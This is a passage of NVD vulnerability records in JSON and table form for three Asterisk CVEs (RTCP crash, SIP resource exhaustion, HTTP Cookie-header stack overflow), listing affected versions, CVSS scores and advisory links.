              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2ED8E415-64FA-4E77-A423-3478E606E58E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E13CA1DD-B384-4408-B4EC-1AA829981016",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE28BD0A-EA30-4265-A5D6-0390F3558D44",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1_rc4:*:*:*:*:*:*",
              "matchCriteriaId": "0F82048D-C65F-4439-BBE4-2D4A9B07EB7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "0D12B31E-C30C-442A-9BD8-504CF7EB1321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B43DA484-83DC-4489-9037-B85B845078E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "D8740005-0BCF-4B76-A600-25A9BF0F3C42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "4298EEE5-3F0E-4227-ACF8-CEE18868055F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack."
    },
    {
      "lang": "es",
      "value": "Se ha descubierto un problema de cierre inesperado remoto en Asterisk Open Source en versiones 13.x anteriores a la 13.18.4; versiones 14.x anteriores a la 14.7.4 y las versiones 15.x anteriores a la 15.1.4, as\u00ed como Certified Asterisk en versiones anteriores a la 13.13-cert9. Ciertos paquetes compuestos RTCP pueden provocar un cierre inesperado en la pila RTCP."
    }
  ],
  "id": "CVE-2017-17664",
  "lastModified": "2024-11-21T03:18:25.420",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-12-13T20:29:00.253",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-012.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/102201"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040009"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27382"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27429"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2017/dsa-4076"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2017-012.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/102201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1040009"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27382"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27429"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.debian.org/security/2017/dsa-4076"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-10-23 17:07

Modified

2024-11-21 00:19

Severity ?

Summary

Unspecified vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk 1.2.x before 1.2.13 and 1.4.x before 1.4.0-beta3 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of "a real pvt structure" that uses more resources than necessary.

References

URL	Tags
cve@mitre.org	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	Patch
cve@mitre.org	http://secunia.com/advisories/22651
cve@mitre.org	http://secunia.com/advisories/22979
cve@mitre.org	http://www.asterisk.org/node/109	Patch
cve@mitre.org	http://www.asterisk.org/node/110	Patch
cve@mitre.org	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
cve@mitre.org	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html
cve@mitre.org	http://www.osvdb.org/29973
cve@mitre.org	http://www.securityfocus.com/archive/1/449183/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/20835
cve@mitre.org	http://www.vupen.com/english/advisories/2006/4098
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/29664
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	Patch
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22651
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22979
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/109	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/110	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/29973
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/449183/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/20835
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/4098
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/29664

Impacted products

Vendor	Product	Version
digium	asterisk	1.2.0_beta1
digium	asterisk	1.2.0_beta2
digium	asterisk	1.2.6
digium	asterisk	1.2.7
digium	asterisk	1.2.8
digium	asterisk	1.2.9
digium	asterisk	1.2.10
digium	asterisk	1.2.11
digium	asterisk	1.2.12
digium	asterisk	1.2.12.1
digium	asterisk	1.4.0
digium	asterisk	1.4.0_beta1
digium	asterisk	1.4.0_beta2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4042CC21-F3CB-4C77-9E60-AF8AA9A191C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C656168D-7D6A-4E84-9196-A8B170E1F7CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "C619138A-557F-419E-9832-D0FB0E9042C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "B6656EA0-4D4F-4251-A30F-48375C5CE3E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "4AAD9104-BA4A-478F-9B56-195E0F9A7DF5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F06C361-D7DF-474B-A835-BA8886C11A80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "69417F54-D92F-46FB-9BFA-995211279C0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B909947-44E3-463E-9FAD-76C8E21A54E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FB2F8AA-B70B-4280-BDBD-023037C16D70",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Unspecified vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk 1.2.x before 1.2.13 and 1.4.x before 1.4.0-beta3 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of \"a real pvt structure\" that uses more resources than necessary."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad no especificada en el controlador de canal SIP  (channels/chan_sip.c) en ASterisk 1.2.x anteriores a 1.2.13 y 1.4.x aneriores a 1.4.0-beta3 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (agotamiento de recursos) a trav\u00e9s de vectores no especificados que resultan en la creaci\u00f3n de una \"estructura pvt real\" que usa m\u00e1s recursos de los necesarios."
    }
  ],
  "evaluatorSolution": "This vulnerability is addressed in the following product releases:\r\nDigium, Asterisk, 1.4.0-beta2\r\nDigium, Asterisk, 1.2.13",
  "id": "CVE-2006-5445",
  "lastModified": "2024-11-21T00:19:16.260",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-10-23T17:07:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22979"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/109"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/110"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/29973"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/20835"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/4098"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29664"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22979"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/109"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.asterisk.org/node/110"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/29973"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/20835"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/4098"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29664"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-04-18 22:14

Modified

2024-11-21 02:06

Severity ?

Summary

main/http.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.x before 1.8.15-cert5 and 11.6 before 11.6-cert2, allows remote attackers to cause a denial of service (stack consumption) and possibly execute arbitrary code via an HTTP request with a large number of Cookie headers.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-001.html	Patch, Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078
cve@mitre.org	http://www.securityfocus.com/bid/66093
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-23340
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-001.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/66093
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-23340

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
fedoraproject	fedora	19
fedoraproject	fedora	20
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
